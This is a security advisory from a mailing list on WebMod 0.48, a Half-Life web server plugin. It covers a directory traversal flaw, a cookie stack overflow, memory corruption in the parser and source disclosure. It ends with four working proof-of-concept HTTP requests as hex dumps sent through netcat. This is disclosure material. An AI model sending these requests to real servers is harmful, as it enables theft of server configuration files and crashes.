[NEWS] WebMod Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



WebMod Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://www.djeyl.net/w.php> WebMod is "an open source MetaMod plugin
which acts as a web server for Half-Life running on the equivalent TCP
port of the UDP one used by the game". Multiple vulnerabilities have been
discovered in WebMod, these allow remote attackers to crash the server as
well as cause it to execute arbitrary code.

DETAILS

Vulnerable Systems:
* WebMod version 0.48

Directory traversal
WebMod uses an anti-directory traversal check which searchs for any "../"
pattern in the HTTP request of the client. So it's enough to use a "..\"
pattern to bypass the check and being able to download any file from the
disk where Half-Life is running included the configuration files of the
game server (like ..\..\..\..\platform\config\server.vdf or
.\..\..\server.cfg). Note that this bug works only on Windows servers.

From server.cpp:
void clientHandle(int connfd, httpquery_t *query, int tid)
...
if(strstr(str,"../")) // hack attempt, display index page
{
str[0]='\0';
}

Cookie buffer-overflow
A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a stack
based buffer-overflow.

From server.cpp:
void connectHandle(void *data)
{
char *input;
char buf[MYSOCK_BUFLEN+1];
...
for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)
buf[j]=input[i];

parser.cpp arbitrary memory writing
The functions in parser.cpp are affected by some memory corruption
vulnerabilities with different effects depending by the type of
variable/script used. In short a value longer than MAX_FILE_SIZE (16384)
bytes can lead tothe writing of custom data in a custom memory address
through strcat (auth.w?mode) or a NULL pointer (auth.w?redir) or an
invalid memory access (the rconpass parameter of auth.w) and so on.

Scripts source disclosure
Adding a dot at the end of the requested URI allows the viewing of the
script source code instead of executing it. This bug (which should work
only on FAT/NTFS filesystems) can be considered a security vulnerability
ONLY if the server runs custom scripts.

Exploits:
webmodz1.txt:
0000000 4547 2054 2e2f 5c2e 2e2e 2e5c 5c2e 2e2e
0000010 2e5c 5c2e 2e2e 2e5c 5c2e 2e2e 625c 6f6f
0000020 2e74 6e69 2069 5448 5054 312f 302e 0a0d
0000030 0a0d
0000032
nc SERVER PORT -v -v < webmodz1.txt

webmodz2.txt
0000000 4547 2054 632f 6e6f 6966 2e67 2077 5448
0000010 5054 312f 302e 0a0d 6f43 6b6f 6569 203a
0000020 6372 6e6f 6170 7373 413d 4141 4141 4141
0000030 4141 4141 4141 4141 4141 4141 4141 4141
*
000b150 4141 4141 4141 4141 0d41 0d0a 000a
000b15d
nc SERVER PORT -v -v < webmodz2.txt

webmodz3.txt
0000000 4547 2054 612f 7475 2e68 3f77 6f6d 6564
0000010 413d 4141 4141 4141 4141 4141 4141 4141
0000020 4141 4141 4141 4141 4141 4141 4141 4141
*
0008cb0 2041 5448 5054 312f 302e 0a0d 0a0d
0008cbe

nc SERVER PORT -v -v < webmodz3.txt

webmodz4.txt
0000000 4547 2054 612f 7475 2e68 2e77 4820 5454
0000010 2f50 2e31 0d30 0d0a 000a
0000019

nc SERVER PORT -v -v < webmodz4.txt


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/webmodz-adv.txt>
http://aluigi.altervista.org/adv/webmodz-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Georgia SoftWorks SSH2 Server Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Georgia SoftWorks SSH2 Server Multiple Vulnerabilities ... void bigstr(u8 *dst, int chr, int len); ...
    (Securiteam)
  • [NT] Ipswitch IMail Server 2006 Multiple IMAP Buffer Overflow Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Ipswitch IMail Server 2006 Multiple IMAP Buffer Overflow Vulnerabilities ...
    (Securiteam)
  • [NEWS] httprint DoS and Arbitrary Script Injection Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... httprint DoS and Arbitrary Script Injection Vulnerabilities ... It relies on web server characteristics to accurately ...
    (Securiteam)
  • [NEWS] Null httpd Remote Resources Consumption (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The bug found in the Null httpd server is usually caused by unchecked ... * Memory consumption: if the server receives data from the client, ... server will finish all the available sockets and will be unreachable. ...
    (Securiteam)
  • [NT] Memory Leak and DoS in NT4 RPC server
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... In addition to retrieving memory, it is possible to crash any NT4 ... RPC server by asking for extremely large amounts of memory, ...
    (Securiteam)